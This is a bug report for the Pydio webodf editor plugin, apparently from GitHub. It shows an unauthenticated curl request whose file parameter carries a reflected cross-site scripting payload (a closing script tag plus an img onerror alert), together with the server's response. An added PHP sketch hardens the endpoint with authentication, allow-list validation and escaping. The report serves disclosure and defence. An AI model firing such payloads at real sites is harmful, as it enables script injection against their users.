
bug in validate/sanitize requests in webodf

Open mbadici opened this issue 7 years ago • 0 comments

Accessing:

curl -v "https://mypydio/plugins/editor.webodf/frame.php?file=1e8ali%3C/script%3E%3Cimg/src=%27x%27/onerror=alert(document.location)%3E"

output:

> User-Agent: curl/7.49.1
> Accept: */*

< HTTP/1.1 200 OK
< Date: Thu, 12 Jul 2018 15:04:55 GMT
< Server: Apache
< X-Frame-Options: SAMEORIGIN
< Strict-Transport-Security: max-age=15768000; includeSubdomains;
< Vary: Accept-Encoding
< Content-Length: 965
< Content-Type: text/html; charset=UTF-8
<

"); //window.odfcanvas.setEditable(true); /* odfcanvas.odfContainer().save(function(err){ console.log(err); }); */ } window.setTimeout(init, 0);
Since the access isn't authenticated, it should output just a redirect to the login page. My version is 8.2.0.

mbadici, Jul 12 '18 15:07
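Added example, not from the issue and not Pydio's own code: a hardened sketch, in PHP because frame.php is PHP, of the two things the report asks for. It refuses to emit any markup for an unauthenticated caller (redirect to login instead), validates the file parameter against a strict allow-list before use, and JSON-encodes the value with the JSON_HEX_* flags so that it can never close a script block or break out of a string literal when reflected. The names is_authenticated, validate_file_param, js_literal, render_frame and LOGIN_URL are hypothetical; the real plugin's structure and its auth layer are not shown on the page.

```php
<?php
// Added example (hypothetical names, not Pydio's code): a frame endpoint
// that reflects a request parameter into inline JavaScript, done safely.
declare(strict_types=1);

const LOGIN_URL = '/login'; // hypothetical login path

// Hypothetical session check; a real application would ask its auth layer.
function is_authenticated(): bool
{
    return isset($_SESSION['user_id']);
}

// Accept only a plain file name: letters, digits, dot, underscore, dash.
// Angle brackets, quotes, slashes and everything else are rejected outright,
// and ".." is refused separately because it passes the character class.
function validate_file_param(?string $file): ?string
{
    if ($file === null || $file === '') {
        return null;
    }
    if (!preg_match('/\A[A-Za-z0-9_.\-]{1,255}\z/', $file)) {
        return null;
    }
    if (strpos($file, '..') !== false) {
        return null;
    }
    return $file;
}

// Encode a value for a <script> context. The JSON_HEX_* flags turn
// < > & ' " into \uXXXX escapes, so "</script>" inside the value cannot
// terminate the script element and quotes cannot end the string literal.
function js_literal(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Builds the response as data so the policy is testable without a web server.
function render_frame(array $query): array
{
    // 1. Authentication first: anonymous callers get a redirect, never the frame.
    if (!is_authenticated()) {
        return ['status' => 302, 'headers' => ['Location: ' . LOGIN_URL], 'body' => ''];
    }
    // 2. Validate before use: a bad value is a 400, not a reflected string.
    $file = validate_file_param($query['file'] ?? null);
    if ($file === null) {
        return ['status' => 400, 'headers' => ['Content-Type: text/plain'], 'body' => 'invalid file parameter'];
    }
    // 3. Only the encoded form ever reaches the script block.
    $body = "<script>\nvar odfFile = " . js_literal($file) . ";\nwindow.setTimeout(init, 0);\n</script>";
    return ['status' => 200, 'headers' => ['Content-Type: text/html; charset=UTF-8'], 'body' => $body];
}

if (PHP_SAPI === 'cli') {
    // Constructed sample input for a quick offline check of the two layers.
    $sample = 'a</script><b>';
    echo validate_file_param($sample) === null ? "rejected by validation\n" : "accepted\n";
    echo js_literal($sample), "\n"; // escaped form: no raw < or > survives
    echo validate_file_param('report.odt') ?? 'null', "\n";
} else {
    // Minimal front controller when served by a web server.
    session_start();
    $r = render_frame($_GET);
    http_response_code($r['status']);
    foreach ($r['headers'] as $h) {
        header($h);
    }
    echo $r['body'];
}
```

Run with `php frame_example.php` to see the validation reject the sample and the encoder neutralise it; note that the encoding step is kept even though validation already rejects such input, so a later relaxation of the allow-list cannot silently reintroduce the reflection.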